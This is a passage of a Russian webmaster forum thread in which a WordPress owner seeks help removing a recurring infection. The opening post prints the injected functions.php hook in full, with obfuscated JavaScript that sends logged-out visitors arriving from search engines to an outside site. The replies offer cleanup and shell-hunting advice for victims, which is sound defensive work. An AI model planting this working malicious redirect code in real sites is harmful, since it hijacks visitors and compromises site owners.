Форум Сайтостроение Веб-строительство

Помогите избавиться от вируса на wordpress

12 3
A
На сайте с 29.07.2011
Offline
8
adnim
3984

Помогите пожалуйста, удалить вирус JS:Redirection-MR Trojan (антивирус выдал) прописывается в файле functions.php (движок Wordpress) вот код: 

<?php 

add_action('get_footer', 'add_sscounter');

function add_sscounter(){

echo '<!--scounter-->';

if(function_exists('is_user_logged_in')){

if(time()%2 == 0 && !is_user_logged_in()){	

echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

}

}

}

?>

Удалил вчера и выставил права только чтение на файл functions.php, но не помогло, сегодня он опять туда прописался :madd:.

Где его найти и удалить??

facegrodno
На сайте с 02.05.2009
Offline
45
facegrodno
#1

искать подозрительный код по все файлам php

нужно найти одно упоминание, а потом при помощи total comander и notepad++ можно все файлы почистить за пару минут

так же проверь выставленные права на папки ftp

как вариант может стоять 777 по всем

Партнерка кино и развлекательное (http://u.to/BrgYAQ) Новая Кинопартнерка (http://goo.gl/tXuaC) NEW Май 2012
Почему по FTP не Как написать имя файла Внедрен вредоносный скрипт, в
D
На сайте с 29.11.2007
Offline
138
dava
#2

- удалить код

- обновить вп

- обновить плагины до последних версий

- если стоит сапа поставить на папку права 755 и другие тоже.

VS
На сайте с 23.03.2010
Offline
42
vB-SQuad
#3

Укажите версию WP. Приучитесь это делать при подобных вопросах.

Напишите используемые плагины, так как брешь может быть именно в них.

Скачайте файлы блога и сравните их с чистым дистрибутивом WP версии, которая установлена на хостинг.

Причин может быть множество, от "дырявой" версии WP до бреши на сервере.

В WP-плагине Contact Form В плагине Easy WP Gogle Chrome - найдена
A
На сайте с 29.07.2011
Offline
8
adnim
#4

dava, Wordpress последний 3.3.1, плагины все обновлены, сапа не стоит.

vB-SQuad, стоят следующие плагины: Akismet, All in One SEO Pack, Crayon Syntax Highlighter, FeedBurner FeedSmith, Google XML Sitemaps, Kinderlose, My WP Plugin Info, PS Auto Sitemap, RusToLat, Seo-Without-Category, TinyMCE Advanced, WordPress Database Backup, Список страниц (wp-pagenavi), WPLANG Lite.

На хостинге параллельно стоят еще 3 сайта, в них вирус не обнаружен.

Удалил код вируса с файла functions.php и поменял пароли.

В плагине WP Google В плагине All in В плагине All In
VS
На сайте с 23.03.2010
Offline
42
vB-SQuad
#5

А на шеллы проверили?

WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#6

На днях был клиент с таким же вирусом на wordpress.

Дописывали его через web-shell залитый на другом сайте, причём тот сайт не трогали.

Может и у вас такая ситуация? Там ещё кстати в вордпрессе и в каком то JS файле было подобное прописано, в каком не помню, но можно поискать например по слову "altavista".

Нужна будет помощь - обращайтесь.

Удалённый системный администратор ( https://remadmin.com )
Яндекс напомнил вебмастерам, как Исследование рынка CMS: какие Google: ссылки, которые не
A
На сайте с 29.07.2011
Offline
8
adnim
#7
vB-SQuad:
А на шеллы проверили?

А чем, подскажите, пожалуйста?

---------- Добавлено 10.02.2012 в 14:04 ----------

WebGomel:

Может и у вас такая ситуация? Там ещё кстати в вордпрессе и в каком то JS файле было подобное прописано, в каком не помню, но можно поискать например по слову "altavista".
Нужна будет помощь - обращайтесь.

Наверное такая, а где, как и чем искать?? И почему по слову "altavista"??

WebGomel
На сайте с 29.10.2011
Offline
78
WebGomel
#8
adnim:
А чем, подскажите, пожалуйста?

Скачиваете например все файлы на компьютер и при нормальном антивирусе шеллы он вам подскажет. Если ничего не подскажет, то надо проверять файлы на наличие уязвимостей. Можно это в принципе всё и на сервере сделать, есть скрипты, погуглите и вы их найдёте.

adnim:
И почему по слову "altavista"??

Ну в коде присутствует 

indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|

Вообще этот код замаскирован под query, но в нормальном не должно быть слов msn, yahoo, altavista, google и так далее.

Если сами не разберётесь - стучите в аську, поможем.

Откуда берутся порно ссылки Проверить сайт на трой Левые папки на сайте.
R
На сайте с 24.01.2008
Offline
180
Алексей
#9

Стучите поможем!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
TK
На сайте с 11.01.2011
Offline
9
tos-ka
#10

актуально.

Подскажите, что этот код делает7

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий